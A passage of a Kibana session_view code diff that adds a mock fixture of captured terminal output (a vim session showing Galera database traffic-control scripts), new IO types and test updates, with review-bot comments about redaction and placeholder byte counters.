All rights reserved.\n\n# Script for setting the reject of queries in Galera\n\nmysql -h127.0.0.1 -P6033 -uroot -e "set global wsrep_reject_queries=\'NONE\'" 2>&1\nRC=$?\n\nif [[ $RC != 0 ]]; then\n >&2 echo "Failed to unset the reject of queries on Galera node, exiting."\n exit $RC\nelse\n echo "Successfully unset the reject of queries."\nfi\n\u001b[94m~ \u001b[16;1H~ \u001b[17;1H~ \u001b[18;1H~ \u001b[19;1H~ \u001b[20;1H~ \u001b[21;1H~ \u001b[22;1H~ \u001b[23;1H~ \u001b[24;1H~ \u001b[25;1H~ \u001b[26;1H~ \u001b[27;1H~ \u001b[28;1H~ \u001b[29;1H~ \u001b[30;1H~ \u001b[31;1H~ \u001b[32;1H~ \u001b[33;1H~ \u001b[34;1H~ \u001b[35;1H~ \u001b[36;1H~ \u001b[37;1H~ \u001b[38;1H~ \u001b[39;1H~ \u001b[40;1H~ \u001b[41;1H~ \u001b[42;1H~ \u001b[43;1H~ \u001b[44;1H~ \u001b[45;1H~ \u001b[46;1H~ \u001b[47;1H~ \u001b[48;1H~ \u001b[49;1H~ \u001b[50;1H~ \u001b[51;1H~ \u001b[52;1H~ \u001b[53;1H~ \u001b[54;1H~ \u001b[55;1H~ \u001b[56;1H~ \u001b[57;1H~ \u001b[58;1H~ \u001b[1;1H\u001b[?25h\u0007\u001b[?25l\u001b[m\u001b[59;1H\u001b[K\u001b[59;1H:\u001b[?2004h\u001b[?25hq\r\u001b[?25l\u001b[?2004l\u001b[59;1H\u001b[K\u001b[59;1H\u001b[?2004l\u001b[?1l\u001b>\u001b[?25h\u001b[?1049l\u001b[23;0;0t,\u001b[?2004h\u001b[?1049h\u001b[22;0;0t\u001b[?1h\u001b=\u001b[?2004h\u001b[1;59r\u001b[?12h\u001b[?12l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[?25l\u001b[59;1H"/usr/local/bin/galera_traffic_stop.sh" [readonly] 115L, 3570C\u001b[1;1H#!/bin/env bash\n# Copyright (C) 2022, ********(R) Corporation. 
All rights reserved.\n\n# Script for rejecting connection on Galera cluster node, either gracefully or not,\n# depending on supplied arguments.\n\nfunction usage() {\n echo "\n This script disables DB connections to Galera node.\n The default is to stop them gracefully.\n\n Usage: $0 [-h] [-w ] [-s ] [-x]\n\n Options:\n -h Prints this help.\n -w Number of seconds for waiting to close the connections.\u001b[17;11HDefault value is to wait for mysql-wait_timeout.\n -s Sleep interval between connections checks.\n -x Kills all connections immediately. Other options are ignored."\n exit\n}\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '3', + _source: { + '@timestamp': '2022-07-14T11:16:31.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\nfunction get_number_db_connections() {\n # count current\n DB_CONNECTIONS_NUMBER=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select count(1) from stats_mysql_processlist where user = \'$DB_USER\' and db like \'db\\_%\' escapee\u001b[26;1H \'\\\'")\n}\n\nfunction set_number_grace_seconds() {\n local mysql_wait_timeout_ms=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select variable_value from global_variables where variable_name = \'mysql-wait_timeout\'")\n GRACE_PERIOD=$((($mysql_wait_timeout_ms+1000-1)/1000))\n}\n\nfunction wait_for_connections() {\n local number_of_loops=$(((($GRACE_PERIOD+$SLEEP_INTERVAL-1)/$SLEEP_INTERVAL)))\u001b[37;5Hecho "Waiting for connections to close for up to $GRACE_PERIOD seconds"\u001b[39;5Hfor i in $(seq 0 $number_of_loops); do\u001b[40;9Hget_number_db_connections\u001b[41;9Hif [[ $DB_CONNECTIONS_NUMBER -eq 0 ]]; then\u001b[42;13Hecho "No connection found for user $DB_USER to this 
node"\u001b[43;13Hbreak\u001b[44;9Helse\u001b[45;13Hecho "$DB_CONNECTIONS_NUMBER connection(s) found, waiting for ${SLEEP_INTERVAL}s, round $i"\u001b[46;13Hsleep $SLEEP_INTERVAL\u001b[47;9Hfi\n done\n}\n\nfunction parse_args() {\n while getopts \'hs:w:x\' opt; do\u001b[53;9Hcase "$opt" in\u001b[54;9Hh)\u001b[55;13Husage\u001b[56;13H;;\u001b[57;9Hs)\u001b[58;13Hif ! [[ $OPTARG =~ ^[0-9]+$ ]]; then\u001b[1;1H\u001b[?25h\u001b[?25l\u001b[59;1H\u001b[K\u001b[59;1H:\u001b[?2004h\u001b[?25hset number\r\u001b[?25l\u001b[1;1H\u001b[38;5;130m 1 \u001b[m#!/bin/env bash\n\u001b[38;5;130m 2 \u001b[m# Copyright (C) 2022, ********(R) Corporation. All rights reserved.\n\u001b[38;5;130m 3 \n 4 \u001b[m# Script for rejecting connection on Galera cluster node, either gracefully or not,\n\u001b[38;5;130m 5 \u001b[m# depending on supplied arguments.\n\u001b[38;5;130m 6 \n 7 \u001b[mfunction usage() {\n\u001b[38;5;130m 8 \u001b[m echo "\n\u001b[38;5;130m 9 \u001b[m This script disables DB connections to Galera node.\n\u001b[38;5;130m 10 \u001b[m The default is to stop them gracefully.\n\u001b[38;5;130m 11 \n 12 \u001b[m Usage: $0 [-h] [-w ] [-s ] [-x]\n\u001b[38;5;130m 13 \n 14 \u001b[m Options:\n\u001b[38;5;130m 15 \u001b[m -h Prints this help.\n\u001b[38;5;130m 16 \u001b[m -w Number of seconds for waiting to close the connections.\n\u001b[38;5;130m 17 \u001b[m Default value is to wait for mysql-wait_timeout.\n\u001b[38;5;130m 18 \u001b[m -s Sleep interval between connections checks.\n\u001b[38;5;130m 19 \u001b[m -x Kills all connections immediately. 
Other options are ignored."\n\u001b[38;5;130m 20 \u001b[m exit\n\u001b[38;5;130m 21 \u001b[m}\n\u001b[38;5;130m 22 \n 23 \u001b[mfunction get_number_db_connections() {\n\u001b[38;5;130m 24 \u001b[m # count current\n\u001b[38;5;130m 25 \u001b[m DB_CONNECTIONS_NUMBER=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select count(1) from stats_mysql_processlist where user = \'$DB_USER\' and db like \'db\\_%%\u001b[26;1H\u001b[38;5;130m \u001b[m\' escape \'\\\'")\n\u001b[38;5;130m 26 \u001b[m}\n\u001b[38;5;130m 27 \n 28 \u001b[mfunction set_number_grace_seconds() {\n\u001b[38;5;130m 29 \u001b[m local mysql_wait_timeout_ms=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select variable_value from global_variables where variable_name = \'mysql-wait_timm\u001b[31;1H\u001b[38;5;130m \u001b[meout\'")\u001b[31;16H\u001b[K\u001b[32;1H\u001b[38;5;130m 30 \u001b[m GRACE_PERIOD=$((($mysql_wait_timeout_ms+1000-1)/1000))\n\u001b[38;5;130m 31 \u001b[m}\n\u001b[38;5;130m 32 \u001b[m\u001b[34;10H\u001b[K\u001b[35;1H\u001b[38;5;130m 33 \u001b[mfunction wait_for_connections() {\u001b[35;42H\u001b[K\u001b[36;1H\u001b[38;5;130m 34 \u001b[m local number_of_loops=$(((($GRACE_PERIOD+$SLEEP_INTERVAL-1)/$SLEEP_INTERVAL)))\n\u001b[38;5;130m 35 \u001b[m\u001b[37;10H\u001b[K\u001b[38;1H\u001b[38;5;130m 36 \u001b[m echo "Waiting for connections to close for up to $GRACE_PERIOD seconds"\n\u001b[38;5;130m 37 \u001b[m\u001b[39;9H\u001b[K\u001b[40;1H\u001b[38;5;130m 38 \u001b[m for i in $(seq 0 $number_of_loops); do\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '4', + _source: { + '@timestamp': '2022-07-14T11:16:32.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001b[38;5;130m 39 \u001b[m 
get_number_db_connections\u001b[41;42H\u001b[K\u001b[42;1H\u001b[38;5;130m 40 \u001b[m if [[ $DB_CONNECTIONS_NUMBER -eq 0 ]]; then\u001b[42;60H\u001b[K\u001b[43;1H\u001b[38;5;130m 41 \u001b[m echo "No connection found for user $DB_USER to this node"\n\u001b[38;5;130m 42 \u001b[m \u001b[8Cbreak\n\u001b[38;5;130m 43 \u001b[m else\u001b[45;21H\u001b[K\u001b[46;1H\u001b[38;5;130m 44 \u001b[m echo "$DB_CONNECTIONS_NUMBER connection(s) found, waiting for ${SLEEP_INTERVAL}s, round $i"\n\u001b[38;5;130m 45 \u001b[m \u001b[10Csleep $SLEEP_INTERVAL\n\u001b[38;5;130m 46 \u001b[m\u001b[8Cfi\n\u001b[38;5;130m 47 \u001b[m done\n\u001b[38;5;130m 48 \u001b[m}\n\u001b[38;5;130m 49 \u001b[m\u001b[51;10H\u001b[K\u001b[52;1H\u001b[38;5;130m 50 \u001b[mfunction parse_args() {\u001b[52;33H\u001b[K\u001b[53;1H\u001b[38;5;130m 51 \u001b[m while getopts \'hs:w:x\' opt; do\n\u001b[38;5;130m 52 \u001b[m case "$opt" in\n\u001b[38;5;130m 53 \u001b[m h)\n\u001b[38;5;130m 54 \u001b[m usage\n\u001b[38;5;130m 55 \u001b[m \u001b[10C;;\n\u001b[38;5;130m 56 \u001b[m s)\u001b[58;19H\u001b[K\u001b[1;9H\u001b[?25h\u001b[?25l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;130m 58 \u001b[m\u001b[16C>&2 echo "Sleep interval (-s) must be a number"\n\u001b[38;5;130m 59 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 60 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 61 \u001b[m\u001b[12CARG_SLEEP_INTERVAL="$OPTARG"\n\u001b[38;5;130m 62 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 63 \u001b[m\u001b[8Cw)\n\u001b[38;5;130m 64 \u001b[m\u001b[12Cif ! 
[[ $OPTARG =~ ^[0-9]+$ ]]; then\n\u001b[38;5;130m 65 \u001b[m\u001b[16C>&2 echo "Wait timeout (-w) must be a number"\n\u001b[38;5;130m 66 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 67 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 68 \u001b[m\u001b[12CARG_GRACE_PERIOD="$OPTARG"\n\u001b[38;5;130m 69 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 70 \u001b[m\u001b[8Cx)\n\u001b[38;5;130m 71 \u001b[m\u001b[12CARG_KILL_IMMEDIATELY=1\n\u001b[38;5;130m 72 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 73 \u001b[m\u001b[8Cesac\n\u001b[38;5;130m 74 \u001b[m done\n\u001b[38;5;130m 75 \n 76 \u001b[m GRACE_PERIOD=${ARG_GRACE_PERIOD:--1}\n\u001b[38;5;130m 77 \u001b[m SLEEP_INTERVAL=${ARG_SLEEP_INTERVAL:-30}\n\u001b[38;5;130m 78 \u001b[m KILL_IMMEDIATELY=${ARG_KILL_IMMEDIATELY:-0}\n\u001b[38;5;130m 79 \u001b[m}\n\u001b[38;5;130m 80 \n 81 \u001b[mDB_USER="rolap01"\n\u001b[38;5;130m 82 \n 83 \u001b[mparse_args $@\n\u001b[38;5;130m 84 \n 85 \u001b[mif [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 86 \u001b[m echo "WARNING: Not waiting for connections to close gracefully"\n\u001b[38;5;130m 87 \u001b[m echo "Press any key to continue... 
wsrep_reject_queries will be set to \'ALL_KILL\'"\n\u001b[38;5;130m 88 \u001b[m read a\n\u001b[38;5;130m 89 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL_KILL\'"\n\u001b[38;5;130m 90 \u001b[melse\n\u001b[38;5;130m 91 \u001b[m # Stop accepting queries in mariadb, do not kill opened connections\n\u001b[38;5;130m 92 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL\'"\n\u001b[38;5;130m 93 \u001b[mfi\n\u001b[38;5;130m 94 \n 95 \u001b[mexit_code=$?\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '5', + _source: { + '@timestamp': '2022-07-14T11:16:33.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001b[38;5;130m 96 \u001b[mif [[ $exit_code != 0 ]]; then\n\u001b[38;5;130m 97 \u001b[m >&2 echo "Failed to set the reject of queries on Galera node, exiting."\n\u001b[38;5;130m 98 \u001b[m exit $exit_code\n\u001b[38;5;130m 99 \u001b[melse\n\u001b[38;5;130m 100 \u001b[m echo "Successfully stopped accepting queries."\n\u001b[38;5;130m 101 \u001b[m if [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 102 \u001b[m\u001b[8Cexit\n\u001b[38;5;130m 103 \u001b[m fi\n\u001b[38;5;130m 104 \u001b[mfi\n\u001b[38;5;130m 105 \n 106 \u001b[mif [[ $GRACE_PERIOD == -1 ]]; then\n\u001b[38;5;130m 107 \u001b[m set_number_grace_seconds\n\u001b[38;5;130m 108 \u001b[mfi\n\u001b[38;5;130m 109 \n 110 \u001b[mwait_for_connections\n\u001b[38;5;130m 111 \u001b[mif [[ $DB_CONNECTIONS_NUMBER != 0 ]]; then\n\u001b[38;5;130m 112 \u001b[m get_number_db_connections\n\u001b[38;5;130m 113 \u001b[m >&2 echo "ERROR: There are still $DB_CONNECTIONS_NUMBER opened DB connections."\n\u001b[38;5;130m 114 \u001b[m exit 3\n\u001b[38;5;130m 115 
\u001b[mfi\b\b\u001b[?25h\u001b[?25l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;130m 1 \u001b[m#!/bin/env bash\n\u001b[38;5;130m 2 \u001b[m# Copyright (C) 2022, ********(R) Corporation. All rights reserved.\n\u001b[38;5;130m 3 \n 4 \u001b[m# Script for rejecting connection on Galera cluster node, either gracefully or not,\n\u001b[38;5;130m 5 \u001b[m# depending on supplied arguments.\n\u001b[38;5;130m 6 \n 7 \u001b[mfunction usage() {\n\u001b[38;5;130m 8 \u001b[m echo "\n\u001b[38;5;130m 9 \u001b[m This script disables DB connections to Galera node.\n\u001b[38;5;130m 10 \u001b[m The default is to stop them gracefully.\n\u001b[38;5;130m 11 \n 12 \u001b[m Usage: $0 [-h] [-w ] [-s ] [-x]\n\u001b[38;5;130m 13 \n 14 \u001b[m Options:\n\u001b[38;5;130m 15 \u001b[m -h Prints this help.\n\u001b[38;5;130m 16 \u001b[m -w Number of seconds for waiting to close the connections.\n\u001b[38;5;130m 17 \u001b[m\u001b[10CDefault value is to wait for mysql-wait_timeout.\n\u001b[38;5;130m 18 \u001b[m -s Sleep interval between connections checks.\n\u001b[38;5;130m 19 \u001b[m -x Kills all connections immediately. 
Other options are ignored."\n\u001b[38;5;130m 20 \u001b[m exit\n\u001b[38;5;130m 21 \u001b[m}\n\u001b[38;5;130m 22 \n 23 \u001b[mfunction get_number_db_connections() {\n\u001b[38;5;130m 24 \u001b[m # count current\n\u001b[38;5;130m 25 \u001b[m DB_CONNECTIONS_NUMBER=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select count(1) from stats_mysql_processlist where user = \'$DB_USER\' and db like \'db\\_%%\u001b[26;1H\u001b[38;5;130m \u001b[m\' escape \'\\\'")\n\u001b[38;5;130m 26 \u001b[m}\n\u001b[38;5;130m 27 \n 28 \u001b[mfunction set_number_grace_seconds() {\n\u001b[38;5;130m 29 \u001b[m local mysql_wait_timeout_ms=$(mysql -h127.0.0.1 -P6032 -uadmin -N --silent -e "select variable_value from global_variables where variable_name = \'mysql-wait_timm\u001b[31;1H\u001b[38;5;130m \u001b[meout\'")\n\u001b[38;5;130m 30 \u001b[m GRACE_PERIOD=$((($mysql_wait_timeout_ms+1000-1)/1000))\n\u001b[38;5;130m 31 \u001b[m}\n\u001b[38;5;130m 32 \n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '6', + _source: { + '@timestamp': '2022-07-14T11:16:34.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: ' 33 \u001b[mfunction wait_for_connections() {\n\u001b[38;5;130m 34 \u001b[m local number_of_loops=$(((($GRACE_PERIOD+$SLEEP_INTERVAL-1)/$SLEEP_INTERVAL)))\n\u001b[38;5;130m 35 \n 36 \u001b[m echo "Waiting for connections to close for up to $GRACE_PERIOD seconds"\n\u001b[38;5;130m 37 \n 38 \u001b[m for i in $(seq 0 $number_of_loops); do\n\u001b[38;5;130m 39 \u001b[m\u001b[8Cget_number_db_connections\n\u001b[38;5;130m 40 \u001b[m\u001b[8Cif [[ $DB_CONNECTIONS_NUMBER -eq 0 ]]; then\n\u001b[38;5;130m 41 \u001b[m\u001b[12Cecho "No connection found for user $DB_USER to this node"\n\u001b[38;5;130m 42 
\u001b[m\u001b[12Cbreak\n\u001b[38;5;130m 43 \u001b[m\u001b[8Celse\n\u001b[38;5;130m 44 \u001b[m\u001b[12Cecho "$DB_CONNECTIONS_NUMBER connection(s) found, waiting for ${SLEEP_INTERVAL}s, round $i"\n\u001b[38;5;130m 45 \u001b[m\u001b[12Csleep $SLEEP_INTERVAL\n\u001b[38;5;130m 46 \u001b[m\u001b[8Cfi\n\u001b[38;5;130m 47 \u001b[m done\n\u001b[38;5;130m 48 \u001b[m}\n\u001b[38;5;130m 49 \n 50 \u001b[mfunction parse_args() {\n\u001b[38;5;130m 51 \u001b[m while getopts \'hs:w:x\' opt; do\n\u001b[38;5;130m 52 \u001b[m\u001b[8Ccase "$opt" in\n\u001b[38;5;130m 53 \u001b[m\u001b[8Ch)\n\u001b[38;5;130m 54 \u001b[m\u001b[12Cusage\n\u001b[38;5;130m 55 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 56 \u001b[m\u001b[8Cs)\u001b[1;9H\u001b[?25h\u001b[?25l\u001b[27m\u001b[29m\u001b[m\u001b[H\u001b[2J\u001b[1;1H\u001b[38;5;130m 58 \u001b[m\u001b[16C>&2 echo "Sleep interval (-s) must be a number"\n\u001b[38;5;130m 59 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 60 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 61 \u001b[m\u001b[12CARG_SLEEP_INTERVAL="$OPTARG"\n\u001b[38;5;130m 62 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 63 \u001b[m\u001b[8Cw)\n\u001b[38;5;130m 64 \u001b[m\u001b[12Cif ! 
[[ $OPTARG =~ ^[0-9]+$ ]]; then\n\u001b[38;5;130m 65 \u001b[m\u001b[16C>&2 echo "Wait timeout (-w) must be a number"\n\u001b[38;5;130m 66 \u001b[m\u001b[16Cexit 1\n\u001b[38;5;130m 67 \u001b[m\u001b[12Cfi\n\u001b[38;5;130m 68 \u001b[m\u001b[12CARG_GRACE_PERIOD="$OPTARG"\n\u001b[38;5;130m 69 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 70 \u001b[m\u001b[8Cx)\n\u001b[38;5;130m 71 \u001b[m\u001b[12CARG_KILL_IMMEDIATELY=1\n\u001b[38;5;130m 72 \u001b[m\u001b[12C;;\n\u001b[38;5;130m 73 \u001b[m\u001b[8Cesac\n\u001b[38;5;130m 74 \u001b[m done\n\u001b[38;5;130m 75 \n 76 \u001b[m GRACE_PERIOD=${ARG_GRACE_PERIOD:--1}\n\u001b[38;5;130m 77 \u001b[m SLEEP_INTERVAL=${ARG_SLEEP_INTERVAL:-30}\n\u001b[38;5;130m 78 \u001b[m KILL_IMMEDIATELY=${ARG_KILL_IMMEDIATELY:-0}\n\u001b[38;5;130m 79 \u001b[m}\n\u001b[38;5;130m 80 \n 81 \u001b[mDB_USER="rolap01"\n\u001b[38;5;130m 82 \n 83 \u001b[mparse_args $@\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '7', + _source: { + '@timestamp': '2022-07-14T11:16:35.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '2', + name: 'vim', + executable: '/bin/vi', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001b[38;5;130m 84 \n 85 \u001b[mif [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 86 \u001b[m echo "WARNING: Not waiting for connections to close gracefully"\n\u001b[38;5;130m 87 \u001b[m echo "Press any key to continue... 
wsrep_reject_queries will be set to \'ALL_KILL\'"\n\u001b[38;5;130m 88 \u001b[m read a\n\u001b[38;5;130m 89 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL_KILL\'"\n\u001b[38;5;130m 90 \u001b[melse\n\u001b[38;5;130m 91 \u001b[m # Stop accepting queries in mariadb, do not kill opened connections\n\u001b[38;5;130m 92 \u001b[m mysql -h127.0.0.1 -P3306 -uroot -e "set global wsrep_reject_queries=\'ALL\'"\n\u001b[38;5;130m 93 \u001b[mfi\n\u001b[38;5;130m 94 \n 95 \u001b[mexit_code=$?\n\u001b[38;5;130m 96 \u001b[mif [[ $exit_code != 0 ]]; then\n\u001b[38;5;130m 97 \u001b[m >&2 echo "Failed to set the reject of queries on Galera node, exiting."\n\u001b[38;5;130m 98 \u001b[m exit $exit_code\n\u001b[38;5;130m 99 \u001b[melse\n\u001b[38;5;130m 100 \u001b[m echo "Successfully stopped accepting queries."\n\u001b[38;5;130m 101 \u001b[m if [[ $KILL_IMMEDIATELY == 1 ]]; then\n\u001b[38;5;130m 102 \u001b[m\u001b[8Cexit\n\u001b[38;5;130m 103 \u001b[m fi\n\u001b[38;5;130m 104 \u001b[mfi\n\u001b[38;5;130m 105 \n 106 \u001b[mif [[ $GRACE_PERIOD == -1 ]]; then\n\u001b[38;5;130m 107 \u001b[m set_number_grace_seconds\n\u001b[38;5;130m 108 \u001b[mfi\n\u001b[38;5;130m 109 \n 110 \u001b[mwait_for_connections\n\u001b[38;5;130m 111 \u001b[mif [[ $DB_CONNECTIONS_NUMBER != 0 ]]; then\n\u001b[38;5;130m 112 \u001b[m get_number_db_connections\n\u001b[38;5;130m 113 \u001b[m >&2 echo "ERROR: There are still $DB_CONNECTIONS_NUMBER opened DB connections."\n\u001b[38;5;130m 114 \u001b[m exit 3\n\u001b[38;5;130m 115 \u001b[mfi\b\b\u001b[?25h\u001b[?25l\nType :qa! 
and press to abandon all changes and exit Vim\u0007\u001b[58;9H\u001b[?25h\u0007\u001b[?25l\u001b[59;1H\u001b[K\u001b[59;1H:\u001b[?2004h\u001b[?25hqa!\r\u001b[?25l\u001b[?2004l\u001b[59;1H\u001b[K\u001b[59;1H\u001b[?2004l\u001b[?1l\u001b>\u001b[?25h\u001b[?1049l\u001b[23;0;0t,\u001bkroot@staging-host:~\u001b\\\n', + }, + }, + }, + }, + + { + _index: 'logs-endpoint.events.process', + _id: '8', + _source: { + '@timestamp': '2022-07-14T11:16:36.570Z', + message: 'hello world security', + event: { + action: 'text_output', + }, + process: { + entity_id: '1', + name: 'bash', + executable: '/bin/bash', + entry_leader: { + entity_id: '1', + }, + io: { + type: 'tty', + total_bytes_captured: 1024, + total_bytes_skipped: 0, + bytes_skipped: [], + text: '\u001bkroot@staging-host:~\u001b\\\b\b\b\b\u001b[1P\b\b\b\b\u001b[1P\b\b\b\b\u001b[1P\b\b\b\b\b\b\b\b\b\n\u001bkroot@staging-host:~\u001b\\\b\u001b[K\b\u001b[K\b\u001b[K\n,\n22/05/26 09:24:09 rack-na/cl_md (md), Cluster ********\n[root@staging-host:~] vi -R /usr/local/bin/galera_traffic_start.sh\u0007\n22/05/26 09:25:32 rack-na/cl_md (md), Cluster ********\n[root@staging-host:~] vi -R /usr/local/bin/galera_traffic_start.sh.sh.sh.sho.shp.sh\n22/05/26 09:30:08 rack-na/cl_md (md), Cluster ********\n[root@staging-host:~] exi\u0007\u0007\u0007exitlogout\n,\u001bec2-user@staging-host:~\u001b\\\n\u001bec2-user@staging-host:~\u001b\\\n,\n22/05/26 09:24:01 rack-na/cl_md (md), Cluster ********\n[ec2-user@staging-host:~] sudo -i\n22/05/26 10:11:37 rack-na/cl_md (md), Cluster ********\n[ec2-user@staging-host:~] exitlogout\n\n', + }, + }, + }, + }, + ], +}; diff --git a/x-pack/plugins/session_view/common/types/process_tree/index.ts b/x-pack/plugins/session_view/common/types/process_tree/index.ts index 04c82e5e9c48d..e620b654db16f 100644 --- a/x-pack/plugins/session_view/common/types/process_tree/index.ts +++ b/x-pack/plugins/session_view/common/types/process_tree/index.ts 
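Review bot: The `text` payloads in this fixture read like a real captured TTY session that was only partially redacted: hostnames and a datacenter are masked as `********`, but `root@staging-host`, `ec2-user`, `DB_USER="rolap01"`, internal script paths and the mysql admin invocations remain. Before this lands, confirm that what is left is acceptable for a public repository, or replace it with synthetic output that still exercises the same escape sequences, cursor movements and the `\u001bk…\u001b\\` title strings the tty player has to handle. Separately, every event reports `total_bytes_captured: 1024` and `total_bytes_skipped: 0` regardless of how long `text` is, so anything that reconciles the byte counters with the content is not exercised by this mock; a header comment such as `// NOTE: io byte counters are placeholder values and do not match the text length` would prevent a false sense of coverage.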
@@ -21,7 +21,7 @@ export const enum EventAction {
 fork = 'fork',
 exec = 'exec',
 end = 'end',
- output = 'output',
+ text_output = 'text_output',
 }
 export interface User {
@@ -62,6 +62,20 @@ export interface Teletype {
 };
 }
+// used by tty_player component to split process.io.text into lines of IO
+export interface IOLine {
+ value?: string;
+
+ // the following is only set client side for caching purposes
+ process_name?: string;
+ process_entity_id?: string;
+ process_entity_cursor?: string;
+}
+
+export interface IOFields {
+ text?: string;
+}
+
 export interface ProcessFields {
 entity_id?: string;
 args?: string[];
@@ -91,6 +105,7 @@ export interface ProcessSelf extends ProcessFields {
 session_leader?: ProcessFields;
 entry_leader?: ProcessFields;
 group_leader?: ProcessFields;
+ io?: IOFields;
 }
 export interface ProcessEventHost {
@@ -209,15 +224,15 @@ export interface ProcessEventOrchestrator {
 name?: string;
 type?: string;
 ip?: string;
+ parent?: {
+ type?: string;
+ };
 };
 namespace?: string;
 cluster?: {
 name?: string;
 id?: string;
 };
- parent?: {
- type?: string;
- };
 }
 export interface ProcessEventCloud {
diff --git a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts
index 61d9a7fb0f6b3..e54bde34fb2f0 100644
--- a/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts
+++ b/x-pack/plugins/session_view/public/components/detail_panel_metadata_tab/helpers.test.ts
@@ -47,15 +47,15 @@ const MOCK_ORCHESTRATOR_DATA: ProcessEventOrchestrator = {
 name: 'pdcsi-node-6hvsp',
 type: 'pod',
 ip: 'PLACEHOLDER_FOR_RESOURCE.IP',
+ parent: {
+ type: 'PLACEHOLDER_FOR_RESOURCE.PARENT.TYPE',
+ },
 },
 namespace: 'kube-system',
 cluster: {
 name: 'elastic-k8s-cluster',
 id: 'PLACEHOLDER_FOR_CLUSTER.ID',
 },
- parent: {
- type: 'PLACEHOLDER_FOR_PARENT.TYPE',
- },
 };
 const MOCK_CLOUD_DATA: ProcessEventCloud = {
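Review bot: In the `@@ -62,6 +62,20 @@` hunk `IOFields` declares only `text?: string`, yet the new fixture in session_view_io_events.mock.ts, typed as `ProcessEventResults`, fills `process.io` with `type`, `total_bytes_captured`, `total_bytes_skipped` and `bytes_skipped`, and constants.ts introduces `TOTAL_BYTES_CAPTURED_PROPERTY = 'process.io.total_bytes_captured'` for server-side use. Either those members are declared somewhere not visible here, or the literal relies on a loosely typed `_source` and the byte counters are read from untyped data; if they are real event fields they belong on the interface, e.g. `type?: string; total_bytes_captured?: number; total_bytes_skipped?: number;` (the `bytes_skipped` element shape is not visible here, so it is best left until its shape is known). The comment on `IOLine` says the `process_*` members are set client side only; spelling out that they are never sent by the server and that snake_case is kept to mirror the event field names would stop a reader from treating them as part of the wire format.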
@@ -164,15 +164,15 @@ describe('detail panel host tab helpers tests', () => { name: undefined, type: 'pod', ip: undefined, + parent: { + type: 'PLACEHOLDER_FOR_RESOURCE.PARENT.TYPE', + }, }, namespace: 'kube-system', cluster: { name: 'elastic-k8s-cluster', id: undefined, }, - parent: { - type: 'PLACEHOLDER_FOR_PARENT.TYPE', - }, }); expect(result.resource.name).toEqual(DASH); expect(result.resource.type).toEqual(MOCK_ORCHESTRATOR_DATA?.resource?.type); @@ -180,7 +180,7 @@ describe('detail panel host tab helpers tests', () => { expect(result.namespace).toEqual(MOCK_ORCHESTRATOR_DATA?.namespace); expect(result.cluster.name).toEqual(MOCK_ORCHESTRATOR_DATA?.cluster?.name); expect(result.cluster.id).toEqual(DASH); - expect(result.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.parent?.type); + expect(result.resource.parent.type).toEqual(MOCK_ORCHESTRATOR_DATA?.resource?.parent?.type); }); it('getOchestratorData returns all data provided', () => { @@ -191,7 +191,7 @@ describe('detail panel host tab helpers tests', () => { 